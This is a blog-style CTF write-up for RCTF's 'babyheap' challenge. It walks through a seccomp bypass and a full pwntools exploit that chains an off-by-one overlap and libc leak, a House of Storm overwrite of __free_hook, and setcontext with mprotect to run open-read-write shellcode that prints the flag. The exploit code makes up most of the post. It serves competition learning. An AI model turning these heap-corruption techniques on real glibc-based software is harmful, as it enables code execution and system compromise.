The only One Pwn challenge I solved In RCTF …TCL QAQ

Start

binary

  • I am struggling to finish my write_up with my poor English…
  • This challenge combined House_of_storm And Seccompt
  • I shoul pwn it earlier , I wasted too much time on passby the SECCOMP to get a shell (In Fact I can Just cat the flag…)

    House of Storm

    It is amazing .
    I have wrote a essay about it LINK

    Seccomp

    there are some limitations in this challenge
  • seccomp
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    ➜  babyheapp seccomp-tools dump ./babyheap  
    line CODE JT JF K
    =================================
    0000: 0x20 0x00 0x00 0x00000004 A = arch
    0001: 0x15 0x01 0x00 0xc000003e if (A == ARCH_X86_64) goto 0003
    0002: 0x06 0x00 0x00 0x00000000 return KILL
    0003: 0x20 0x00 0x00 0x00000000 A = sys_number
    0004: 0x15 0x00 0x01 0x00000029 if (A != socket) goto 0006
    0005: 0x06 0x00 0x00 0x00000000 return KILL
    0006: 0x15 0x00 0x01 0x0000003b if (A != execve) goto 0008
    0007: 0x06 0x00 0x00 0x00000000 return KILL
    0008: 0x15 0x00 0x01 0x00000039 if (A != fork) goto 0010
    0009: 0x06 0x00 0x00 0x00000000 return KILL
    0010: 0x15 0x00 0x01 0x0000009d if (A != prctl) goto 0012
    0011: 0x06 0x00 0x00 0x00000000 return KILL
    0012: 0x15 0x00 0x01 0x0000003a if (A != vfork) goto 0014
    0013: 0x06 0x00 0x00 0x00000000 return KILL
    0014: 0x15 0x00 0x01 0x00000065 if (A != ptrace) goto 0016
    0015: 0x06 0x00 0x00 0x00000000 return KILL
    0016: 0x15 0x00 0x01 0x0000003e if (A != kill) goto 0018
    0017: 0x06 0x00 0x00 0x00000000 return KILL
    0018: 0x15 0x00 0x01 0x00000038 if (A != clone) goto 0020
    0019: 0x06 0x00 0x00 0x00000000 return KILL
    0020: 0x06 0x00 0x00 0x7fff0000 return ALLOW

So we can not call get a shell directly.
But luckily , We have open & read & write….
and we can just get flag by open+read+write

setcontext

usage of setcontext

Solution

  • #1Off_By_One(shrink) ===> overlap ===> Leak libc

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    add(0x500)#0
    add(0x88)#1
    add(0x88)#2
    free(0)
    add(0x18)#0
    edit(0,"A"*0x18)
    add(0x88)#3
    add(0x88)#4
    free(3)
    free(1)
    add(0x2d8)#1
    add(0x88)#3
    add(0x48)#5
    free(4)
    show(5)
    #0x47b75+base
    base=u64(p.readline()[:-1].ljust(8,'\x00'))-(0x7ffff7dd1b78-0x7ffff7a0d000)
    libc.address=base
    log.warning(hex(base))
  • clear unsorted bin ptr
    add(0x458+0x90)#4

  • do step#1 again to set __free_hook by House of storm

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    aim=libc.sym['__free_hook']
    bk=aim-0x20+8
    bk_nextsize=aim-0x20-0x18-5
    add(0x500)#6
    add(0x88)#7
    add(0x88)#8
    free(6)
    add(0x18)#6
    edit(6,"A"*0x18)
    add(0x88)#9
    add(0x88)#10
    free(9)
    free(7)
    add(0x2d8)#7
    add(0x78)#9
    add(0x48)#11
    add(0x4a9)#12
    edit(10,p64(0)*7+p64(0x4a1)+p64(0)+p64(bk)+p64(0)+p64(bk_nextsize))#edit the head of LARGECHUNK
    edit(11,p64(0)+p64(0x21)*7)
    free(10)
    edit(11,p64(0)+p64(0x4b1)+p64(0)+p64(aim-0x20))#edit the head & bk of UNSORTEDCHUNK
    add(0x48)#10
  • Now we can Run our Shellcode by setcontext+0x35 + mprotect

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    magic=libc.sym['__free_hook']+0x8
    # read + mprotect
    top='''
    mov rdx,0x1234000
    mov al,9
    mov rdi,rdx
    jmp .+0x14
    '''
    shellcode='''
    mov rsi,0x1000
    mov dx,0x7
    mov r10,0x22
    syscall
    mov rsi,rax
    xchg r9,rax
    mov rdi,rax
    syscall
    push 0x1234000
    ret
    '''
    edit(10,asm(top).ljust(0x10,'\x00')+p64(base+0x47b75)+p64(magic-0x18)+asm(shellcode))
    #payload for setcontext
    payload=p64(0x7ffff7b15e89-0x7ffff7a3b000+base)+p64(0x7ffff7a7d4d5-0x7ffff7a3b000+base)+p64(0)
    payload=payload.ljust(0x28,'\x00')+p64(0xfffffffffffffff)+p64(0)
    payload=payload.ljust(0x68,'\x00')+p64(magic&0xffffffffffff000)+p64(0x1000)
    payload=payload.ljust(0x88,'\xff')+p64(0x7)
    payload=payload.ljust(0xa0,'\x00')+p64(magic)+p64(libc.sym['mprotect'])
    edit(12,payload)
    free(12)
  • open+read+write

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    sh='''
    mov rsp,0x1234400
    mov rax,2
    mov rdi,0x67616c662f2e
    push rdi
    mov rdi,rsp
    mov rsi,0
    mov rdx,0
    syscall
    mov rdi,rax
    mov rax,0
    mov rsi,0x1234500
    mov rdx,0x100
    syscall
    mov rax,1
    mov rdi,1
    mov rsi,0x1234500
    mov rdx,0x100
    syscall
    '''
    sh=asm(sh)
    p.send(sh)

..I try to shrink the length of my shellcode,So that I can finish my exp in chunk_12.emmm, but I just wasted a lot of time and failed for unknow reason….
so I need more space to write my shellcode to locate the problem …but I … get the flag …

exp

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
from pwn import *
def cmd(c):
p.sendlineafter(": \n",str(c))
def add(size):
cmd(1)
p.sendlineafter("ize: ",str(size))

def edit(idx,c):
cmd(2)
p.sendlineafter("dex: ",str(idx))
p.sendafter("tent: ",c)
def free(idx):
cmd(3)
p.sendlineafter("dex: ",str(idx))
def show(idx):
cmd(4)
p.sendlineafter("dex: ",str(idx))
context.arch='amd64'

libc=ELF("./libc-2.23.so")
#p=remote("123.206.174.203",20001)

p=process('./babyheap')
#House of Storm
add(0x500)#0
add(0x88)#1
add(0x88)#2
free(0)
add(0x18)#0
edit(0,"A"*0x18)
add(0x88)#3
add(0x88)#4
free(3)
free(1)
add(0x2d8)#1
add(0x88)#3
add(0x48)#5
free(4)
show(5)
base=u64(p.readline()[:-1].ljust(8,'\x00'))-(0x7ffff7dd1b78-0x7ffff7a0d000)
libc.address=base
log.warning(hex(base))
#get libc base
add(0x458+0x90)#4
#clear main_arena

aim=libc.sym['__free_hook']
bk=aim-0x20+8
bk_nextsize=aim-0x20-0x18-5
add(0x500)#6
add(0x88)#7
add(0x88)#8
free(6)
add(0x18)#6
edit(6,"A"*0x18)
add(0x88)#9
add(0x88)#10
free(9)
free(7)
add(0x2d8)#7
add(0x78)#9
add(0x48)#11
add(0x4a9)#12
edit(10,p64(0)*7+p64(0x4a1)+p64(0)+p64(bk)+p64(0)+p64(bk_nextsize))#edit the head of LARGECHUNK
edit(11,p64(0)+p64(0x21)*7)
free(10)
edit(11,p64(0)+p64(0x4b1)+p64(0)+p64(aim-0x20))#edit the head & bk of UNSORTEDCHUNK
add(0x48)#10
#House of Storm


# setcontext
magic=libc.sym['__free_hook']+0x8
top='''
mov rdx,0x1234000
mov al,9
mov rdi,rdx
jmp .+0x14
'''
shellcode='''
mov rsi,0x1000
mov dx,0x7
mov r10,0x22
syscall
mov rsi,rax
xchg r9,rax
mov rdi,rax
syscall
push 0x1234000
ret
'''
edit(10,asm(top).ljust(0x10,'\x00')+p64(base+0x47b75)+p64(magic-0x18)+asm(shellcode))
payload=p64(0x7ffff7b15e89-0x7ffff7a3b000+base)+p64(0x7ffff7a7d4d5-0x7ffff7a3b000+base)+p64(0)
payload=payload.ljust(0x28,'\x00')+p64(0xfffffffffffffff)+p64(0)
payload=payload.ljust(0x68,'\x00')+p64(magic&0xffffffffffff000)+p64(0x1000)
payload=payload.ljust(0x88,'\xff')+p64(0x7)
payload=payload.ljust(0xa0,'\x00')+p64(magic)+p64(libc.sym['mprotect'])
edit(12,payload)
free(12)
# setcontext



# Show time
context.log_level='debug'
sh='''
mov rsp,0x1234400
mov rax,2
mov rdi,0x67616c662f2e
push rdi
mov rdi,rsp
mov rsi,0
mov rdx,0
syscall
mov rdi,rax
mov rax,0
mov rsi,0x1234500
mov rdx,0x100
syscall
mov rax,1
mov rdi,1
mov rsi,0x1234500
mov rdx,0x100
syscall
'''
sh=asm(sh)
p.send(sh)
p.interactive()

_

It’s a Challenge which combined
Storm:
https://n132.github.io/2019/05/07/2019-05-07-House-of-Storm/

setcontext:
https://n132.github.io/2019/05/10/2019-05-08-Startctf2019-Heap-master/#setcontext()

calc(pwnable.tw):
https://n132.github.io/2019/01/18/2019-01-18-pwnable-tw-Trip/#calc